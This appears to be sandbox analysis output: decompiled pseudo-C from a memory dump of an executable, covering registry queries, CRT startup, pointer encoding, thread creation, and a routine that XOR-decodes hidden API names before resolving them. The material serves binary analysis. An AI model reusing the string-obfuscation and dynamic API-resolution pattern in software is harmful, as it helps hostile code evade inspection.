						__eax = 0x6c;
						 *(__ebp - 0xb0) = __ax;
						__eax = 0x61;
						 *(__ebp - 0xae) = __ax;
						__eax = 0x79;
						 *(__ebp - 0xac) = __ax;
						__eax = 0x56;
						 *(__ebp - 0xaa) = __ax;
						__eax = 0x65;
						 *(__ebp - 0xa8) = __ax;
						__eax = 0x72;
						 *(__ebp - 0xa6) = __ax;
						__eax = 0x73;
						 *(__ebp - 0xa4) = __ax;
						__eax = 0x69;
						 *(__ebp - 0xa2) = __ax;
						__eax = 0x6f;
						 *(__ebp - 0xa0) = __ax;
						__eax = 0x6e;
						 *(__ebp - 0x9e) = __ax;
						__eax = 0;
						 *(__ebp - 0x9c) = __ax;
						__ebp - 0xc = __ebp - 0x24c;
						__eax = __ebp - 0xb8;
						 *(__ebp - 0xc) = __edi;
						__eax = RegQueryValueExW( *(__ebp - 0x10), __ebp - 0xb8, __ebx, __ebx, __ebp - 0x24c, __ebp - 0xc); // executed
						if(__eax == 0) {
							__ebp - 0x44c = E012C1F39(__ebp - 0x44c, __edi, L"   (", 0xffffffff);
							__ebp - 0x24c = __ebp - 0x44c;
							E012C1F39(__ebp - 0x44c, __edi, __ebp - 0x24c, 0xffffffff) = __ebp - 0x44c;
							__eax = E012C1F39(__ebp - 0x44c, __edi, 0x12e06d4, 0xffffffff);
						}
						__ebp - 0x44c = E012C1F39(__ebp - 0x44c, __edi, "\n", 0xffffffff);
						__eax =  *(__ebp - 8);
						if(__eax != __ebx) {
							__edx = __eax + 2;
							do {
								__cx =  *__eax;
								__eax = __eax + 2;
							} while (__cx != __bx);
							__eax = __eax - __edx;
							__ecx = __eax;
							__eax = __ebp - 0x44c;
							__edx = __eax + 2;
							 *(__ebp + 8) = __eax + 2;
							do {
								__dx =  *__eax;
								__eax = __eax + 2;
							} while (__dx != __bx);
							__eax = __eax -  *(__ebp + 8);
							__eax = __eax >> 1;
							__eax = __eax + __ecx;
							 *(__ebp + 8) = __eax;
							__eax = E012C1D71(__edi, __esi,  *(__ebp - 8), __eax); // executed
							_pop(__ecx);
							_pop(__ecx);
							 *(__ebp - 8) = __eax;
							goto L21;
						} else {
							__eax = __ebp - 0x44c;
							__edx = __eax + 2;
							do {
								__cx =  *__eax;
								__eax = __eax + 2;
							} while (__cx != __bx);
							__eax = __eax - __edx;
							__eax = __eax >> 1;
							 *(__ebp + 8) = __eax;
							 *(__ebp - 8) = __eax;
							__eax = E012C8BA0(__eax, __ebx,  *(__ebp + 8));
							L21:
							__eax = __ebp - 0x44c;
							__edx = __eax + 2;
							do {
								__cx =  *__eax;
								__eax = __eax + 2;
							} while (__cx != __bx);
							__ebp - 0x44c =  *(__ebp + 8);
							__eax =  *(__ebp + 8) >> 1;
							__eax = E012C1F39( *(__ebp - 8),  *(__ebp + 8) >> 1, __ebp - 0x44c,  *(__ebp + 8) >> 1);
							goto L1;
						}
					} else {
						goto L1;
					}
				}
				L1:
				if( *((intOrPtr*)(_t121 - 0x10)) == _t118) {
					_push(_t118);
					_push(_t118);
					_push(_t118);
					_push(_t118);
					_push(_t121 - 0xc);
					_push(_t121 - 0x24c);
					_push( *((intOrPtr*)(_t121 - 0x24)));
					 *((intOrPtr*)(_t121 - 0xc)) = 0x80;
					_push( *((intOrPtr*)(_t121 - 0x2c)));
					return E0130BA8E(_t121 - 0x24c, _t119);
				}
				_push( *((intOrPtr*)(_t121 - 0x10)));
				return E0130F7C9(_t113);
			}

0x012cd775
0x012cd775
0x012cd775
0x012cd777
0x012cd77b
0x012cd77e
0x012cd785
0x012cd788
0x012cd78f
0x012cd792
0x012cd799
0x012cd79c
0x012cd7a3
0x012cd7a6
0x012cd7ad
0x012cd7b0
0x012cd7b7
0x012cd7ba
0x012cd7c1
0x012cd7c4
0x012cd7cb
0x012cd7ce
0x012cd7d5
0x012cd7d8
0x012cd7df
0x012cd7e2
0x012cd7e9
0x012cd7ec
0x012cd7f3
0x012cd7f6
0x012cd7fa
0x012cd7fd
0x012cd802
0x012cd80c
0x012cd810
0x00000000
0x00000000
0x012cd818
0x012cd81b
0x012cd822
0x012cd825
0x012cd82c
0x012cd82f
0x012cd836
0x012cd839
0x012cd840
0x012cd843
0x012cd84a
0x012cd84d
0x012cd854
0x012cd857
0x012cd85e
0x012cd861
0x012cd868
0x012cd86b
0x012cd872
0x012cd875
0x012cd87c
0x012cd87f
0x012cd886
0x012cd889
0x012cd890
0x012cd893
0x012cd89a
0x012cd89d
0x012cd8a4
0x012cd8a5
0x012cd8ac
0x012cd8ae
0x012cd8b9
0x012cd8c2
0x012cd8cc
0x012cd8d3
0x012cd8d7
0x012cd8e8
0x012cd8eb
0x012cd8ef
0x012cd8f2
0x012cd8f6
0x012cd8f9
0x012cd8fd
0x012cd900
0x012cd904
0x012cd907
0x012cd90b
0x012cd90e
0x012cd912
0x012cd915
0x012cd919
0x012cd91c
0x012cd920
0x012cd923
0x012cd927
0x012cd92a
0x012cd92e
0x012cd92f
0x012cd933
0x012cd935
0x012cd93d
0x012cd946
0x012cd94d
0x012cd950
0x012cd954
0x00000000
0x00000000
0x012cd963
0x012cd96b
0x012cd975
0x012cd978
0x012cd97f
0x012cd982
0x012cd989
0x012cd98c
0x012cd993
0x012cd996
0x012cd99d
0x012cd9a0
0x012cd9a7
0x012cd9aa
0x012cd9b1
0x012cd9b4
0x012cd9bb
0x012cd9be
0x012cd9c5
0x012cd9c8
0x012cd9cf
0x012cd9d2
0x012cd9d9
0x012cd9dc
0x012cd9e3
0x012cd9e6
0x012cd9ed
0x012cd9f0
0x012cd9f7
0x012cd9f8
0x012cd9ff
0x012cda01
0x012cda0c
0x012cda15
0x012cda1f
0x012cda22
0x012cda26
0x012cda37
0x012cda45
0x012cda59
0x012cda61
0x012cda66
0x012cda78
0x012cda7d
0x012cda85
0x012cdabf
0x012cdac2
0x012cdac2
0x012cdac5
0x012cdac8
0x012cdacd
0x012cdad1
0x012cdad3
0x012cdad9
0x012cdadc
0x012cdadf
0x012cdadf
0x012cdae2
0x012cdae5
0x012cdaea
0x012cdaed
0x012cdaef
0x012cdaf9
0x012cdafc
0x012cdb01
0x012cdb02
0x012cdb03
0x00000000
0x012cda87
0x012cda87
0x012cda8d
0x012cda90
0x012cda90
0x012cda93
0x012cda96
0x012cda9b
0x012cda9d
0x012cdaa5
0x012cdab0
0x012cdab5
0x012cdb06
0x012cdb06
0x012cdb0c
0x012cdb0f
0x012cdb0f
0x012cdb12
0x012cdb15
0x012cdb26
0x012cdb29
0x012cdb2f
0x00000000
0x012cdb34
0x00000000
0x00000000
0x00000000
0x012cd8d7
0x012cd71f
0x012cd722
0x012cd730
0x012cd731
0x012cd732
0x012cd733
0x012cd737
0x012cd73e
0x012cd73f
0x012cd742
0x012cd749
0x00000000
0x012cd74c
0x012cd724
0x00000000

APIs

RegQueryValueExW.KERNEL32(?,?), ref: 012CD80C
RegQueryValueExW.KERNEL32(?,?,?,?,?,?), ref: 012CD8D3
RegQueryValueExW.KERNEL32(?,?,?,?,?,00000004,?,?,?,?), ref: 012CD950
RegQueryValueExW.KERNEL32(?,?,?,?,?,00000004), ref: 012CDA22

Strings

(, xrefs: 012CDA2A

Memory Dump Source

Source File: 00000005.00000002.13712061616.00000000012C1000.00000020.sdmp, Offset: 012C0000, based on PE: true

Associated: 00000005.00000002.13712049935.00000000012C0000.00000002.sdmp
Associated: 00000005.00000002.13712100432.00000000012DC000.00000002.sdmp
Associated: 00000005.00000002.13712116936.00000000012E2000.00000004.sdmp
Associated: 00000005.00000002.13712132386.00000000012E7000.00000020.sdmp
Associated: 00000005.00000002.13712484929.000000000143B000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12c0000_ASC.jbxd

Function 012C3626, Relevance: 9.1, APIs: 6, Instructions: 55

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 46%

			E012C3626(void* __ebx, void* __edx, intOrPtr* __edi, intOrPtr* __esi) {
				intOrPtr _t3;
				intOrPtr _t4;
				intOrPtr _t5;
				intOrPtr _t6;
				void* _t7;
				void* _t9;
				intOrPtr* _t11;
				intOrPtr _t12;
				intOrPtr* _t14;
				void* _t15;
				void* _t16;
				intOrPtr _t17;
				intOrPtr* _t25;
				intOrPtr* _t29;

				_t25 = __edi;
				_t19 = __ebx;
				_t3 =  *__esi(); // executed
				_push( *0x12e38d8);
				 *0x12e38d4 = _t3; // executed
				_t4 =  *__esi(); // executed
				_push( *0x12e38dc);
				 *0x12e38d8 = _t4; // executed
				_t5 =  *__esi(); // executed
				_push( *0x12e38e0);
				 *0x12e38dc = _t5; // executed
				_t6 =  *__esi(); // executed
				 *0x12e38e0 = _t6;
				_t7 = E012C82EA();
				if(_t7 == 0) {
					L5:
					E012C329C(_t19);
					_t9 = 0;
					__eflags = 0;
				} else {
					E0137FDFC(__ebx, __edi);
					_t11 =  *_t25( *0x12e38d4, E012C3420, _t7); // executed
					_t12 =  *_t11();
					 *0x12e2904 = _t12;
					if(_t12 == 0xffffffff) {
						goto L5;
					} else {
						_t29 = E012C8FD6(1, 0x214);
						if(_t29 == 0) {
							goto L5;
						} else {
							_t14 =  *_t25( *0x12e38dc,  *0x12e2904, _t29); // executed
							_t15 =  *_t14();
							_t33 = _t15;
							if(_t15 == 0) {
								goto L5;
							} else {
								_push(0);
								_push(_t29);
								_t16 = E012C32D9(__ebx, __edx, _t25, _t29, _t33);
								_push(__edx);
								_t17 = E012F1263(_t16, _t29);
								 *(_t29 + 4) =  *(_t29 + 4) | 0xffffffff;
								 *_t29 = _t17;
								_t9 = 1;
							}
						}
					}
				}
				return _t9;
			}

0x012c3626
0x012c3626
0x012c3626
0x012c3628
0x012c362e
0x012c3633
0x012c3635
0x012c363b
0x012c3640
0x012c3642
0x012c3648
0x012c364d
0x012c364f
0x012c3654
0x012c365b
0x012c36c0
0x012c36c0
0x012c36c5
0x012c36c5
0x012c365d
0x012c365e
0x012c366e
0x012c3670
0x012c3672
0x012c367a
0x00000000
0x012c367c
0x012c3688
0x012c368e
0x00000000
0x012c3690
0x012c369d
0x012c369f
0x012c36a1
0x012c36a3
0x00000000
0x012c36a5
0x012c36a5
0x012c36a7
0x012c36a8
0x012c36af
0x012c36b0
0x012c36b5
0x012c36b9
0x012c36bd
0x012c36bd
0x012c36a3
0x012c368e
0x012c367a
0x012c36c9

APIs

RtlEncodePointer.NTDLL ref: 012C3626
RtlEncodePointer.NTDLL ref: 012C3633
RtlEncodePointer.NTDLL ref: 012C3640
RtlEncodePointer.NTDLL ref: 012C364D
RtlDecodePointer.NTDLL(Function_00003420,00000000), ref: 012C366E

Part of subcall function 012C8FD6: Sleep.KERNEL32(00000000), ref: 012C8FFE

RtlDecodePointer.NTDLL(00000000), ref: 012C369D

Part of subcall function 012C329C: TlsFree.KERNEL32(00000016), ref: 012C32C7

Memory Dump Source

Source File: 00000005.00000002.13712061616.00000000012C1000.00000020.sdmp, Offset: 012C0000, based on PE: true

Associated: 00000005.00000002.13712049935.00000000012C0000.00000002.sdmp
Associated: 00000005.00000002.13712100432.00000000012DC000.00000002.sdmp
Associated: 00000005.00000002.13712116936.00000000012E2000.00000004.sdmp
Associated: 00000005.00000002.13712132386.00000000012E7000.00000020.sdmp
Associated: 00000005.00000002.13712484929.000000000143B000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12c0000_ASC.jbxd

Function 012D58AB, Relevance: 7.6, APIs: 5, Instructions: 138
library

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 97%

			E012D58AB() {
				struct HINSTANCE__* _v8;
				char _v11;
				intOrPtr _v15;
				intOrPtr _v19;
				char _v20;
				char _v23;
				intOrPtr _v27;
				intOrPtr _v31;
				char _v32;
				char _v35;
				intOrPtr _v39;
				intOrPtr _v43;
				char _v44;
				char _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				char _v64;
				char _v68;
				short _v70;
				short _v72;
				short _v74;
				short _v76;
				short _v78;
				short _v80;
				short _v82;
				char _v84;
				char _v86;
				intOrPtr _v90;
				intOrPtr _v94;
				intOrPtr _v98;
				intOrPtr _v102;
				char _v104;
				void* __ebx;
				void* __ebp;
				struct HINSTANCE__* _t89;
				void* _t91;
				_Unknown_base(*)()* _t93;
				void* _t94;
				_Unknown_base(*)()* _t96;
				void* _t97;
				_Unknown_base(*)()* _t99;
				void* _t100;
				_Unknown_base(*)()* _t102;
				void* _t103;
				_Unknown_base(*)()* _t105;
				signed int _t117;
				_Unknown_base(*)()** _t119;
				void* _t123;

				_v70 = 0xa4;
				_v72 = 0xed;
				_v74 = 0xf4;
				_v76 = 0xe5;
				_v78 = 0xf3;
				_v80 = 0xe8;
				_v82 = 0xec;
				_t119 =  *0x12e5974; // 0x892da0
				_v84 = 0xf7;
				_v68 = 0;
				_t117 = 0;
				do {
					 *(_t123 + _t117 * 2 - 0x50) =  *(_t123 + _t117 * 2 - 0x50) ^ 0x000000a4;
					_t117 = _t117 + 1;
					_t125 = _t117 - 8;
				} while (_t117 < 8);
				_push( &_v84);
				_v68 = 1;
				_push(0);
				_t89 = E01342753( &_v84, 0, _t125);
				_v8 = _t89;
				if(_t89 == 0) {
					L19:
					__eflags = 0;
					return 0;
				}
				_v52 = 0xaafdd9de;
				_v56 = 0xd9c3d2ef;
				_v60 = 0xcfc6c3ec;
				_v64 = 0xc2decbfa;
				_v48 = 0;
				_t91 = 0;
				do {
					 *(_t123 + _t91 - 0x3c) =  *(_t123 + _t91 - 0x3c) ^ 0x000000aa;
					_t91 = _t91 + 1;
				} while (_t91 < 0x10);
				_v48 = 1;
				_t93 = GetProcAddress(_v8,  &_v64); // executed
				 *_t119 = _t93;
				_v90 = 0xaef9cbc3;
				_v94 = 0xcfe0cbc2;
				_v98 = 0xc7e8cac0;
				_v102 = 0xc7e8c6da;
				_v104 = 0xcffe;
				_v86 = 0;
				_t94 = 0;
				do {
					 *(_t123 + _t94 - 0x64) =  *(_t123 + _t94 - 0x64) ^ 0x000000ae;
					_t94 = _t94 + 1;
				} while (_t94 < 0x12);
				_v86 = 1;
				_t96 = GetProcAddress(_v8,  &_v104); // executed
				 *(_t119 + 4) = _t96;
				_v15 = 0xb1e6f8c1;
				_v19 = 0xdcf2c3c5;
				_v20 = 0xe2;
				_v11 = 0;
				_t97 = 0;
				do {
					 *(_t123 + _t97 - 0x10) =  *(_t123 + _t97 - 0x10) ^ 0x000000b1;
					_t97 = _t97 + 1;
				} while (_t97 < 9);
				_v11 = 1;
				_t99 = GetProcAddress(_v8,  &_v20); // executed
				 *(_t119 + 8) = _t99;
				_v27 = 0xb4e3c6dc;
				_v31 = 0xf7e6c6c0;
				_v32 = 0xe7;
				_v23 = 0;
				_t100 = 0;
				do {
					 *(_t123 + _t100 - 0x1c) =  *(_t123 + _t100 - 0x1c) ^ 0x000000b4;
					_t100 = _t100 + 1;
				} while (_t100 < 9);
				_v23 = 1;
				_t102 = GetProcAddress(_v8,  &_v32); // executed
				 *(_t119 + 0xc) = _t102;
				_v39 = 0xb7e0fec5;
				_v43 = 0xc3e4c5c3;
				_v44 = 0xe4;
				_v35 = 0;
				_t103 = 0;
				do {
					 *(_t123 + _t103 - 0x28) =  *(_t123 + _t103 - 0x28) ^ 0x000000b7;
					_t103 = _t103 + 1;
				} while (_t103 < 9);
				_v35 = 1;
				_t105 = GetProcAddress(_v8,  &_v44); // executed
				 *(_t119 + 0x10) = _t105;
				if( *_t119 == 0 ||  *(_t119 + 4) == 0 ||  *(_t119 + 8) == 0 ||  *(_t119 + 0xc) == 0 || _t105 == 0) {
					goto L19;
				} else {
					return 1;
				}
			}

0x012d58b8
0x012d58bf
0x012d58c6
0x012d58cd
0x012d58d4
0x012d58db
0x012d58e2
0x012d58ed
0x012d58f3
0x012d58f7
0x012d58fa
0x012d58fc
0x012d58fe
0x012d5903
0x012d5904
0x012d5904
0x012d590c
0x012d590d
0x012d5911
0x012d5912
0x012d5917
0x012d591c
0x012d5a59
0x012d5a59
0x00000000
0x012d5a59
0x012d5922
0x012d5929
0x012d5930
0x012d5937
0x012d593e
0x012d5941
0x012d5943
0x012d5943
0x012d5948
0x012d5949
0x012d595c
0x012d5960
0x012d5962
0x012d5964
0x012d596b
0x012d5972
0x012d5979
0x012d5980
0x012d5986
0x012d5989
0x012d598b
0x012d598b
0x012d5990
0x012d5991
0x012d599d
0x012d59a1
0x012d59a3
0x012d59a6
0x012d59ad
0x012d59b4
0x012d59b8
0x012d59bb
0x012d59bd
0x012d59bd
0x012d59c2
0x012d59c3
0x012d59cf
0x012d59d3
0x012d59d5
0x012d59d8
0x012d59df
0x012d59e6
0x012d59ea
0x012d59ed
0x012d59ef
0x012d59ef
0x012d59f4
0x012d59f5
0x012d5a01
0x012d5a05
0x012d5a07
0x012d5a0a
0x012d5a11
0x012d5a18
0x012d5a1c
0x012d5a1f
0x012d5a21
0x012d5a21
0x012d5a26
0x012d5a27
0x012d5a33
0x012d5a37
0x012d5a39
0x012d5a3f
0x00000000
0x012d5a54
0x00000000
0x012d5a56

APIs

GetProcAddress.KERNEL32(012D136C,000000AA,00000014,00000000,?,?,00000000), ref: 012D5960
GetProcAddress.KERNEL32(012D136C,000000AE), ref: 012D59A1
GetProcAddress.KERNEL32(012D136C,000000B1), ref: 012D59D3
GetProcAddress.KERNEL32(012D136C,000000B4), ref: 012D5A05
GetProcAddress.KERNEL32(012D136C,000000B7), ref: 012D5A37

Memory Dump Source

Source File: 00000005.00000002.13712061616.00000000012C1000.00000020.sdmp, Offset: 012C0000, based on PE: true

Associated: 00000005.00000002.13712049935.00000000012C0000.00000002.sdmp
Associated: 00000005.00000002.13712100432.00000000012DC000.00000002.sdmp
Associated: 00000005.00000002.13712116936.00000000012E2000.00000004.sdmp
Associated: 00000005.00000002.13712132386.00000000012E7000.00000020.sdmp
Associated: 00000005.00000002.13712484929.000000000143B000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12c0000_ASC.jbxd

Function 012C20FF, Relevance: 7.6, APIs: 5, Instructions: 94

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 58%

			E012C20FF(void* __ebx, void* __edx, void* __edi) {
				void* _t18;
				intOrPtr _t20;
				void* _t24;
				intOrPtr _t25;
				void* _t27;
				void* _t28;
				void* _t29;
				void* _t30;
				intOrPtr _t31;
				void* _t44;
				signed int _t45;
				void* _t48;
				void* _t51;
				intOrPtr _t52;
				void* _t53;

				_t49 = __edi;
				_t48 = __edx;
				_t42 = __ebx;
				_t52 =  *0x12e6b38; // 0x0
				if(_t52 == 0) {
					_push(0);
					_push(0);
					_push(1);
					_push(0);
					_push(__ebx);
					E01373E20(_t18, __ebx, __edi, 0);
				}
				_t53 =  *0x12c0000 - 0x5a4d; // 0x5a4d
				if(_t53 == 0) {
					_t20 =  *0x12c003c; // 0xf0
					__eflags =  *((intOrPtr*)(_t20 + 0x12c0000)) - 0x4550;
					if( *((intOrPtr*)(_t20 + 0x12c0000)) != 0x4550) {
						goto L3;
					} else {
						_t43 = 0x10b;
						__eflags =  *((intOrPtr*)(_t20 + 0x12c0018)) - 0x10b;
						if( *((intOrPtr*)(_t20 + 0x12c0018)) != 0x10b) {
							goto L3;
						} else {
							__eflags =  *((intOrPtr*)(_t20 + 0x12c0074)) - 0xe;
							if( *((intOrPtr*)(_t20 + 0x12c0074)) <= 0xe) {
								goto L3;
							} else {
								__eflags =  *(_t20 + 0x12c00e8);
								_t7 =  *(_t20 + 0x12c00e8) != 0;
								__eflags = _t7;
								_t43 = 0 | _t7;
								 *(_t51 - 0x1c) = _t7;
							}
						}
					}
				} else {
					L3:
					 *(_t51 - 0x1c) = 0;
				}
				if(E012C22EB() == 0) {
					E012C20C0(0x1c);
					_pop(_t43);
				}
				if(E012C354F(_t49) == 0) {
					E012C20C0(0x10);
					_pop(_t43);
				}
				E012C8007();
				 *((intOrPtr*)(_t51 - 4)) = 0;
				_t24 = E012C7DC2(_t42, _t49); // executed
				_t56 = _t24;
				if(_t24 < 0) {
					_t24 = E012C25D6(_t48, _t56);
					_t43 = 0x1b;
				}
				_push(_t51); // executed
				_t25 = E01370B3A(_t24, _t49); // executed
				 *0x12e6b34 = _t25;
				 *0x12e3240 = E012C7D2B(_t42, 0);
				_t27 = E012C7C70(_t43);
				_t57 = _t27;
				if(_t27 < 0) {
					E012C25D6(_t48, _t57);
					_t43 = 8;
				}
				_t28 = E012C79FA(_t43, _t48, _t49);
				_t58 = _t28;
				if(_t28 < 0) {
					_push(9);
					E012C25D6(_t48, _t58);
				}
				_t29 = E012C23B5(_t49, 0, 1); // executed
				_pop(_t44);
				_t59 = _t29;
				if(_t29 != 0) {
					E012C25D6(_t48, _t59);
					_t44 = _t29;
				}
				_t30 = E012C799B(_t44);
				if(( *(_t51 - 0x3c) & 0x00000001) == 0) {
					_t45 = 0xa;
				} else {
					_t45 =  *(_t51 - 0x38) & 0x0000ffff;
				}
				_push(_t45);
				_push(_t30);
				_t31 = E012D1829(0x12c0000, 0); // executed
				 *((intOrPtr*)(_t51 - 0x20)) = _t31;
				if( *(_t51 - 0x1c) == 0) {
					E012C258C(_t31);
				}
				E012C25B8();
				 *((intOrPtr*)(_t51 - 4)) = 0xfffffffe;
				return E012C80A5( *((intOrPtr*)(_t51 - 0x20)));
			}

0x012c20ff
0x012c20ff
0x012c20ff
0x012c2101
0x012c2107
0x012c2109
0x012c210a
0x012c210b
0x012c210d
0x012c210e
0x012c210f
0x012c210f
0x012c2119
0x012c2120
0x012c2127
0x012c212c
0x012c2136
0x00000000
0x012c2138
0x012c2138
0x012c213d
0x012c2144
0x00000000
0x012c2146
0x012c2146
0x012c214d
0x00000000
0x012c214f
0x012c2151
0x012c2157
0x012c2157
0x012c2157
0x012c215a
0x012c215a
0x012c214d
0x012c2144
0x012c2122
0x012c2122
0x012c2122
0x012c2122
0x012c2164
0x012c2168
0x012c216d
0x012c216d
0x012c2175
0x012c2179
0x012c217e
0x012c217e
0x012c217f
0x012c2184
0x012c2187
0x012c218c
0x012c218e
0x012c2192
0x012c2197
0x012c2197
0x012c2198
0x012c2199
0x012c219e
0x012c21a8
0x012c21ad
0x012c21b2
0x012c21b4
0x012c21b8
0x012c21bd
0x012c21bd
0x012c21be
0x012c21c3
0x012c21c5
0x012c21c7
0x012c21c9
0x012c21ce
0x012c21d1
0x012c21d6
0x012c21d7
0x012c21d9
0x012c21dc
0x012c21e1
0x012c21e1
0x012c21e2
0x012c21eb
0x012c21f5
0x012c21ed
0x012c21ed
0x012c21ed
0x012c21f6
0x012c21f7
0x012c21fe
0x012c2203
0x012c2209
0x012c220c
0x012c220c
0x012c2211
0x012c2246
0x012c2255

APIs

__RTC_Initialize.LIBCMT ref: 012C217F
__amsg_exit.LIBCMT ref: 012C2192

Part of subcall function 012C7C70: _parse_cmdline.LIBCMT ref: 012C7CC7
Part of subcall function 012C7C70: _parse_cmdline.LIBCMT ref: 012C7D08

__amsg_exit.LIBCMT ref: 012C21B8

Part of subcall function 012C79FA: _strlen.LIBCMT ref: 012C7A24
Part of subcall function 012C79FA: _strlen.LIBCMT ref: 012C7A55

__amsg_exit.LIBCMT ref: 012C21C9

Part of subcall function 012C23B5: __initterm_e.LIBCMT ref: 012C23EB

__amsg_exit.LIBCMT ref: 012C21DC

Memory Dump Source

Source File: 00000005.00000002.13712061616.00000000012C1000.00000020.sdmp, Offset: 012C0000, based on PE: true

Associated: 00000005.00000002.13712049935.00000000012C0000.00000002.sdmp
Associated: 00000005.00000002.13712100432.00000000012DC000.00000002.sdmp
Associated: 00000005.00000002.13712116936.00000000012E2000.00000004.sdmp
Associated: 00000005.00000002.13712132386.00000000012E7000.00000020.sdmp
Associated: 00000005.00000002.13712484929.000000000143B000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12c0000_ASC.jbxd

Function 012C8704, Relevance: 6.1, APIs: 4, Instructions: 76

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 41%

			E012C8704(void* __ecx, void* __edx, intOrPtr _a4) {
				intOrPtr _v8;
				void* __ebx;
				void* __esi;
				void* _t11;
				intOrPtr _t13;
				intOrPtr* _t14;
				intOrPtr _t15;
				void* _t18;
				intOrPtr _t20;
				intOrPtr _t21;
				void* _t22;
				void* _t25;
				void* _t27;
				intOrPtr _t28;
				void* _t30;
				void* _t34;
				void* _t36;
				void* _t37;
				intOrPtr* _t40;
				void* _t42;
				intOrPtr* _t43;
				intOrPtr* _t44;
				void* _t48;

				_t36 = __edx;
				_t43 = _t42;
				E01371FCC(_t11, _t27, _t43);
				_t13 =  *_t43( *0x12e6b28, _t37, _t27, __ecx, _t48); // executed
				_t28 = _t13;
				_v8 = _t28;
				_t14 =  *_t43( *0x12e6b24); // executed
				_t44 = _t14;
				if(_t44 < _t28) {
					L12:
					_t15 = 0;
				} else {
					_t40 = _t44 - _t28;
					_t2 = _t40 + 4; // 0x4
					if(_t2 < 4) {
						goto L12;
					} else {
						_t30 = E012CB067(_t28);
						_t3 = _t40 + 4; // 0x4
						_t18 = _t3;
						if(_t30 >= _t18) {
							E012F624A(_t30, _t44); // executed
							_t20 =  *_t40(_t18, _a4); // executed
							 *_t44 = _t20;
							_t21 =  *_t40(_t44 + 4); // executed
							 *0x12e6b24 = _t21;
							_t15 = _a4;
						} else {
							_t22 = 0x800;
							if(_t30 < 0x800) {
								_t22 = _t30;
							}
							_t23 = _t22 + _t30;
							if(_t22 + _t30 >= _t30) {
								_t25 = E012C9022(_v8, _t23);
								_pop(_t34);
								if(_t25 != 0) {
									L9:
									_push(_t25);
									return E013675EB(_t25, _t34, _t36);
								}
							}
							_t5 = _t30 + 0x10; // 0x10
							_t24 = _t5;
							if(_t5 >= _t30) {
								_t25 = E012C9022(_v8, _t24);
								_pop(_t34);
								if(_t25 != 0) {
									goto L9;
								}
							}
							goto L12;
						}
					}
				}
				return _t15;
			}

0x012c8704
0x012c870c
0x012c870d
0x012c8719
0x012c8721
0x012c8723
0x012c8726
0x012c8728
0x012c872c
0x012c87b3
0x012c87b3
0x012c8732
0x012c8734
0x012c8736
0x012c873c
0x00000000
0x012c873e
0x012c8744
0x012c8746
0x012c8746
0x012c874c
0x012c879a
0x012c879f
0x012c87a1
0x012c87a7
0x012c87a9
0x012c87ae
0x012c874e
0x012c874e
0x012c8755
0x012c8757
0x012c8757
0x012c8759
0x012c875d
0x012c8763
0x012c8769
0x012c876c
0x012c8784
0x012c8787
0x00000000
0x012c878b
0x012c876c
0x012c876e
0x012c876e
0x012c8773
0x012c8779
0x012c877f
0x012c8782
0x00000000
0x00000000
0x012c8782
0x00000000
0x012c8773
0x012c874c
0x012c873c
0x012c87b9

APIs

RtlDecodePointer.NTDLL(?,?,?,?,012C8808,?,012E0BC0,0000000C,012C8834,?,?,012C2402,012C802D), ref: 012C8719
RtlDecodePointer.NTDLL(?,?,?,?,012C8808,?,012E0BC0,0000000C,012C8834,?,?,012C2402,012C802D), ref: 012C8726

Part of subcall function 012C9022: Sleep.KERNEL32(00000000,00000000,00000000,?,012C877E,00000000,00000010,?,?,?,?,012C8808,?,012E0BC0,0000000C,012C8834), ref: 012C904C

RtlEncodePointer.NTDLL(00000004,?,?,?,?,?,012C8808,?,012E0BC0,0000000C,012C8834,?,?,012C2402,012C802D), ref: 012C879F
RtlEncodePointer.NTDLL(-00000004,?,?,?,?,012C8808,?,012E0BC0,0000000C,012C8834,?,?,012C2402,012C802D), ref: 012C87A7

Memory Dump Source

Source File: 00000005.00000002.13712061616.00000000012C1000.00000020.sdmp, Offset: 012C0000, based on PE: true

Associated: 00000005.00000002.13712049935.00000000012C0000.00000002.sdmp
Associated: 00000005.00000002.13712100432.00000000012DC000.00000002.sdmp
Associated: 00000005.00000002.13712116936.00000000012E2000.00000004.sdmp
Associated: 00000005.00000002.13712132386.00000000012E7000.00000020.sdmp
Associated: 00000005.00000002.13712484929.000000000143B000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12c0000_ASC.jbxd

Function 012D1539, Relevance: 6.0, APIs: 4, Instructions: 43
thread

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 44%

			E012D1539(void* __edx, void* __edi, void* __eflags) {
				void* _t9;
				void* _t12;
				void* _t13;
				void* _t14;
				void* _t18;
				void* _t20;
				void* _t21;

				_t21 = __eflags;
				_t18 = __edx;
				_t9 = CreateThread(0, 0, E012CFA1A, 0, 0, _t20 - 8); // executed
				CloseHandle(_t9);
				_t12 = CreateThread(0, 0, E012CF9B1, 0, 0, _t20 - 8); // executed
				_push(0);
				_push(0);
				_push(0);
				_push(_t18);
				_t13 = E01370B1B(_t12, _t18, _t21);
				 *0x12e2f0c = _t13; // executed
				_t14 = CreateThread(0, 0, E012CFF4D, _t13, 0, _t20 - 8); // executed
				 *0x12e2f10 = _t14;
				_push( *((intOrPtr*)(_t20 + 0x14)));
				_push( *((intOrPtr*)(_t20 + 0x10)));
				_push( *((intOrPtr*)(_t20 + 0xc)));
				_push( *((intOrPtr*)(_t20 + 8)));
				return E012F6584(_t14);
			}

0x012d1539
0x012d1539
0x012d1548
0x012d154b
0x012d155e
0x012d1560
0x012d1561
0x012d1563
0x012d1564
0x012d1565
0x012d1577
0x012d157c
0x012d166e
0x012d1810
0x012d1813
0x012d1816
0x012d1819
0x00000000

APIs

CreateThread.KERNEL32(00000000,00000000,Function_0000FA1A,00000000,00000000,?), ref: 012D1548
CloseHandle.KERNEL32(00000000), ref: 012D154B
CreateThread.KERNEL32(00000000,00000000,Function_0000F9B1,00000000,00000000,?), ref: 012D155E
CreateThread.KERNEL32(00000000,00000000,Function_0000FF4D,00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 012D157C

Memory Dump Source

